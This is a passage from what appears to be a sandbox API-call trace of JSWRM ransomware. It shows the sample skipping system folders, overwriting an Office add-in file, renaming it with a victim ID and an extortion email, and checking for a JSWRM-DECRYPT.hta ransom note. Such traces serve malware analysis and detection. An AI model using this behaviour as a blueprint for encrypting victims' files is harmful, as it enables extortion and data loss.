lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0123.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0123.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0123.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0123.746] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6e5cc4e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12068, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.746] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0123.746] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0123.746] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0123.746] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0123.746] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0123.746] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0123.746] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0123.746] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.746] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0123.746] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0123.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0123.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0123.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0123.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0123.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0123.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.747] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x68b32cb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x68b32cb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x68ff786, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.747] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0123.747] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0123.747] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0123.747] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0123.747] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0123.747] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0123.747] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0123.747] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.747] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0123.747] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0123.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0123.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0123.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0123.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0123.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0123.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f280 [0123.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0123.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.748] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2ee20e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2ee20e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2f5480d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ea8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.748] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0123.748] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0123.748] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0123.748] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0123.748] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0123.748] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0123.748] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0123.748] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.748] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0123.748] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0123.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0123.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0123.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0123.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0123.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0123.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d728, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0123.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23fa98 [0123.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0123.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0123.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0123.748] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1341a2e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ebba, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.da.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0123.749] lstrcmpiW (lpString1="PowerViewRes.da.xap", lpString2=".") returned 1 [0123.749] lstrcmpiW (lpString1="PowerViewRes.da.xap", lpString2="..") returned 1 [0123.749] lstrcmpiW (lpString1="PowerViewRes.da.xap", lpString2="...") returned 1 [0123.749] lstrcmpiW (lpString1="PowerViewRes.da.xap", lpString2="windows") returned -1 [0123.749] lstrcmpiW (lpString1="PowerViewRes.da.xap", lpString2="recovery") returned -1 [0123.749] lstrcmpiW (lpString1="PowerViewRes.da.xap", lpString2="perflogs") returned 1 [0123.749] lstrcmpiW (lpString1="PowerViewRes.da.xap", lpString2="documents and settings") returned 1 [0123.749] lstrcmpiW (lpString1="PowerViewRes.da.xap", lpString2="$RECYCLE.BIN") returned 1 [0123.749] lstrcmpiW (lpString1="PowerViewRes.da.xap", lpString2="system volume information") returned -1 [0123.749] lstrcmpiW (lpString1="PowerViewRes.da.xap", lpString2="msocache") returned 1 [0123.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.da.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0123.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.da.xap", cchWideChar=19, lpMultiByteStr=0x2412e0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.da.xap", lpUsedDefaultChar=0x0) returned 19 [0123.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.da.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0123.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.da.xap", cchWideChar=19, lpMultiByteStr=0x2411c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.da.xap", lpUsedDefaultChar=0x0) returned 19 [0123.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0123.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0123.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0123.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\da\\PowerViewRes.da.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\da\\powerviewres.da.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.750] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=322490) returned 1 [0123.750] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0123.750] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0123.770] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.770] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0123.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.770] CloseHandle (hObject=0x338) returned 1 [0123.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0123.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0123.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0123.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0123.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0123.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0123.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0123.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0123.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0123.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.771] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\da\\PowerViewRes.da.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\da\\powerviewres.da.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\da\\PowerViewRes.da.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\da\\powerviewres.da.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0123.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0123.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0123.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0123.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0123.772] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1341a2e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ebba, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.da.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0123.772] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0123.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0123.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0123.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0123.773] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133f40a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133f40a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="de", cAlternateFileName="")) returned 1 [0123.773] lstrcmpiW (lpString1="de", lpString2=".") returned 1 [0123.773] lstrcmpiW (lpString1="de", lpString2="..") returned 1 [0123.773] lstrcmpiW (lpString1="de", lpString2="...") returned 1 [0123.773] lstrcmpiW (lpString1="de", lpString2="windows") returned -1 [0123.773] lstrcmpiW (lpString1="de", lpString2="recovery") returned -1 [0123.773] lstrcmpiW (lpString1="de", lpString2="perflogs") returned -1 [0123.773] lstrcmpiW (lpString1="de", lpString2="documents and settings") returned -1 [0123.773] lstrcmpiW (lpString1="de", lpString2="$RECYCLE.BIN") returned 1 [0123.773] lstrcmpiW (lpString1="de", lpString2="system volume information") returned -1 [0123.773] lstrcmpiW (lpString1="de", lpString2="msocache") returned -1 [0123.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0123.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0123.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0123.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0123.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0123.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0123.774] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\de\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\de\\jswrm-decrypt.hta")) returned 0xffffffff [0123.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0123.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0123.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0123.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0123.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0123.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0123.775] RtlAllocateHeap 